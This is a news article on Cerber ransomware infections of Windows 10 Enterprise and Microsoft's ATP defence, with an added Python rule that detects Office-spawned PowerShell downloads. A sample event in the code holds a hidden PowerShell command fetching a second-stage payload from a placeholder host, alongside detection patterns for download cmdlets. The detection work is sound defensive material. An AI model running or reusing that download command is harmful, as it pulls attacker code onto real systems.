New figures from Microsoft show that Cerber has been the most prolific ransomware family infecting corporate environments.
Microsoft says it saw 2114 infections by the ransomware between December and January on corporate endpoints running Windows 10 Enterprise. Microsoft says Windows 10 breaks the ransomware kill chain thanks to its in-house ATP exploit mitigation service, which normally comes at a cost.
Boasting of its threat protection capabilities, Windows 10 can allegedly recognise Cerber and other ransomware payloads and prevent most of them from carrying out any malicious activity. This will most likely be improved in an approaching upgrade so that infected machines can be isolated from the network, and there are also plans to add quarantine capabilities.
These Cerber infections appeared as early as July 2016, when the author of the ransomware began using Office 365 macros to carry out infections.
Microsoft's security experts demonstrated how its Advanced Threat Protection works in a technical analysis of a Cerber kill chain: the macro run by the customer needs to launch PowerShell, which then pulls down a secondary component holding the payload.
As a result, the Cerber payload was unable to load, and the ATP protection generated four alerts that gave the security operations centre command-and-control IP address data and Cerber payload information to help block emerging variants.
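The kill chain described above (Office document, macro, PowerShell, download of a second-stage component) is the kind of parent/child process pattern an endpoint detection rule can flag. The following Python is an added example written for this article, not Microsoft's ATP logic or any code from the original analysis. It runs over a few constructed process-creation events (Sysmon-style fields, with placeholder paths and an `.invalid` hostname standing in for the real download host), reconstructs the process chain, and emits an alert carrying the hostnames a SOC would want for blocking, much like the alerts the article describes.

```python
import re
from urllib.parse import urlparse

# Constructed sample process-creation events (simplified Sysmon Event ID 1 fields).
# Paths, PIDs and the hostname are placeholders, not real indicators.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 3988,
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": '"WINWORD.EXE" /n "invoice.docm"'},
    {"pid": 4300, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -w hidden -c \"(New-Object Net.WebClient)"
                     ".DownloadFile('http://payload-host.example.invalid/stage2.bin',"
                     "'C:\\Users\\Public\\stage2.bin')\""},
    # Benign admin use of PowerShell from cmd.exe: must not alert.
    {"pid": 5011, "ppid": 1200,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "command_line": "powershell.exe -File C:\\scripts\\inventory.ps1"},
]

# Office applications that should not normally spawn script interpreters.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Interpreters commonly launched by macros to fetch a second stage.
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments indicating a download of a secondary component.
DOWNLOAD_MARKERS = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|net\.webclient|start-bitstransfer", re.I)
URL_RE = re.compile(r'''https?://[^\s'"()]+''', re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def process_chain(events, pid):
    """Follow ppid links back to the root we know about, oldest ancestor first."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return list(reversed(chain))


def analyse_event(ev, events):
    """Return an alert dict if an Office app spawned a shell, else None."""
    parent, child = basename(ev["parent_image"]), basename(ev["image"])
    if parent not in OFFICE_APPS or child not in SHELLS:
        return None
    cmd = ev.get("command_line", "")
    hosts = {urlparse(u).hostname for u in URL_RE.findall(cmd)}
    return {
        "pid": ev["pid"],
        "chain": process_chain(events, ev["pid"]),
        # A download marker raises severity: the second stage is being fetched.
        "severity": "high" if DOWNLOAD_MARKERS.search(cmd) else "medium",
        # Hostnames the SOC can feed into blocking, as in the article's alerts.
        "hosts": sorted(h for h in hosts if h),
    }


def scan(events):
    """Run the rule over every event and collect the alerts."""
    return [a for a in (analyse_event(e, events) for e in events) if a]


if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The rule keys on the parent/child relationship rather than on any Cerber-specific string, so it also covers other macro-delivered families; tuning for environments that legitimately drive PowerShell from Office add-ins is left to the reader.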
Ransomware families Genasom and Locky took second and third place for attacking Windows 10 Enterprise endpoints with about 1000 infections each.